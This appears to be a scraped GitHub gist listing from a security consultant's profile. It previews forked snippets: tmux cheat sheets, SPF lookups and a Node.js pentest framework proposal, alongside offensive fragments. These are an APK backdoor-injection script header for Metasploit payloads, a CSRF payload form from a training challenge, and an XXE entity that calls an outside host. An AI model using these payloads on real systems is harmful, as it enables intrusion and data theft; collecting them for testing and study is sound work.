Skip to content

Instantly share code, notes, and snippets.

View Murthysagi's full-sized avatar
Pro

MurthyCode Murthysagi

Pro
  • Sr. Security Consultant
  • India
View GitHub Profile
@Murthysagi
Murthysagi / apk-embed-payload.rb
Created May 30, 2016 10:17 — forked from skulltech/apk-embed-payload.rb
POC for injecting Metasploit payloads on arbitrary APKs
#!/usr/bin/env ruby
# apk_backdoor.rb
# This script is a POC for injecting metasploit payloads on
# arbitrary APKs.
# Authored by timwr, Jack64
#
require 'nokogiri'
require 'fileutils'

SPF Records

Sender Policy Framework (SPF) is an email validation system designed to prevent spam by detecting email spoofing.

# get spf record domain from google
dig TXT +short google.com

# get spf record from google
dig @8.8.8.8 TXT +short _spf.google.com
@Murthysagi
Murthysagi / payload.html
Created January 11, 2017 09:41 — forked from vkobel/payload.html
CSRF payload for token based mechanism (root-me sample)
<body onload="get()">
<form id="form-payload" action="?action=profile" method="POST" enctype="multipart/form-data">
<input type="hidden" name="username" value="your_username"/>
<input type="hidden" name="status" value="on"/>
<input type="hidden" id="forged-token" name="token" value=""/>
<input type="submit" value="go"/>
</form>
<script>
@Murthysagi
Murthysagi / gist:08b75e4888bcfc598cdce5c9408d7c09
Created December 14, 2017 12:14 — forked from jesusprubio/gist:8f092af4ca252e252eab
Proposal: A Node.js penetration test framework

Proposal: Node.js penetration test framework

Hi guys! Since I started to write Bluebox-ng I've been tracking the different security projects I found written in Node.js. Now we've published the first stable version we think it's the right moment to speak among us (and, of course, everyone interested in it :).

Why?

  • I think we're rewriting the same stuff in our respective projects again and again. For example, almost any tool supports IPv6 because the functions we need are still not present in the Node core and the libraries I found (IMHO) were not enough.
  • There're different projects implementing exactly the same thing, ie: port scanners.
  • We're working in a too new environment, so we need to make it together.
@Murthysagi
Murthysagi / Buffer Overflow Tutorial in Kali.md
Created January 18, 2018 17:12 — forked from apolloclark/Buffer Overflow Tutorial in Kali.md
Buffer overflow demonstration in Kali Linux, based on the Computerphile video

How to pass the OSCP

  1. Recon
  2. Find vuln
  3. Exploit
  4. Document it

Recon

Unicornscans in cli, nmap in msfconsole to help store loot in database.

@Murthysagi
Murthysagi / tmux-cheats.md
Created August 27, 2018 18:42 — forked from Starefossen/tmux-cheats.md
My personal tmux cheat sheet for working with sessions, windows, and panes. `NB` I have remapped the command prefix to `ctrl` + `a`.

Sessions

New Session

  • tmux new [-s name] [cmd] (:new) - new session

Switch Session

  • tmux ls (:ls) - list sessions
  • tmux switch [-t name] (:switch) - switches to an existing session
@Murthysagi
Murthysagi / tmux.md
Created August 27, 2018 19:26 — forked from andreyvit/tmux.md
tmux cheatsheet

tmux cheat sheet

(C-x means ctrl+x, M-x means alt+x)

Prefix key

The default prefix is C-b. If you (or your muscle memory) prefer C-a, you need to add this to ~/.tmux.conf:

remap prefix to Control + a

@Murthysagi
Murthysagi / XXE_payloads
Created September 3, 2018 19:03 — forked from staaldraad/XXE_payloads
XXE Payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------
<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>
@Murthysagi
Murthysagi / urllib-request_basicAuth.py
Created February 11, 2019 14:08 — forked from kaito834/urllib-request_basicAuth.py
Python 3.x snippet code for Basic Authentication HTTP request by urllib.request
#!/usr/bin/env python
#
# I tested by Python 3.4.3 on Windows 8.1
# Python 3.4.3 (v3.4.3:9b73f1c3e601, Feb 24 2015, 22:43:06) [MSC v.1600 32 bit (Intel)] on win32
import urllib.request
import getpass
# If you access to url below via Proxy,
# set environment variable 'http_proxy' before execute this.